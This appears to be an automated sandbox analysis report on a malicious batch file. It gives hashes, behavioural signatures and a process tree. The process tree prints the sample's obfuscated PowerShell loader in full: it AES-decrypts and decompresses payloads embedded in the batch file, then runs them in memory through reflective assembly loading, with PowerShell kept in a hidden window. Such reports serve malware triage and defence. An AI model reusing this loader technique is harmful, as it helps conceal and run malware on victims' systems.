Analysis
-
max time kernel
14s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
04/03/2025, 23:49
Static task
static1
Behavioral task
behavioral1
Sample
skibidigenesis.bat
Resource
win7-20241010-en
4 signatures
150 seconds
General
-
Target
skibidigenesis.bat
-
Size
397KB
-
MD5
72c4399da0d8899b4e60ba732d20ac70
-
SHA1
ff22be71d8e3be9473c711a997619804588c8dbc
-
SHA256
39532fe4477427729c951df53e455c6e67925adf3920138063e0064531ccc1c4
-
SHA512
58a928f109ae7a1ef307ca7babfe44ed218095d2bd7f4d637acf1d145be6d7fbb95d038d743c42b72f605c77fe5cbca603baca224e36e48e4c063ebb1b20a6df
-
SSDEEP
12288:1+WS3omtKVLLk59mhJi1GKIuVHhp3oPOLxc1jAFtr3kggy:QWBDLQ54kHjoP4iVobkggy
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2260 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2260 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2260 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2540 wrote to memory of 932 2540 cmd.exe 30 PID 2540 wrote to memory of 932 2540 cmd.exe 30 PID 2540 wrote to memory of 932 2540 cmd.exe 30 PID 2540 wrote to memory of 2260 2540 cmd.exe 31 PID 2540 wrote to memory of 2260 2540 cmd.exe 31 PID 2540 wrote to memory of 2260 2540 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\skibidigenesis.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DhmhMNr65U2LjTJhoKpzIxw0wZqQLl/kh0GnMQQYjU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UREvY15sxapeLe2YvOFrrw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $wdjfl=New-Object System.IO.MemoryStream(,$param_var); $IlgNN=New-Object System.IO.MemoryStream; $XkowE=New-Object System.IO.Compression.GZipStream($wdjfl, [IO.Compression.CompressionMode]::Decompress); $XkowE.CopyTo($IlgNN); $XkowE.Dispose(); $wdjfl.Dispose(); $IlgNN.Dispose(); $IlgNN.ToArray();}function execute_function($param_var,$param2_var){ $Xcfjm=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZVfvM=$Xcfjm.EntryPoint; $ZVfvM.Invoke($null, $param2_var);}$Ktuyg = 'C:\Users\Admin\AppData\Local\Temp\skibidigenesis.bat';$host.UI.RawUI.WindowTitle = $Ktuyg;$mJVHb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Ktuyg).Split([Environment]::NewLine);foreach ($FoAar in $mJVHb) { if ($FoAar.StartsWith('lcdRYrvHHVkZCxwzUjvy')) { $ifSQW=$FoAar.Substring(20); break; }}$payloads_var=[string[]]$ifSQW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2260
-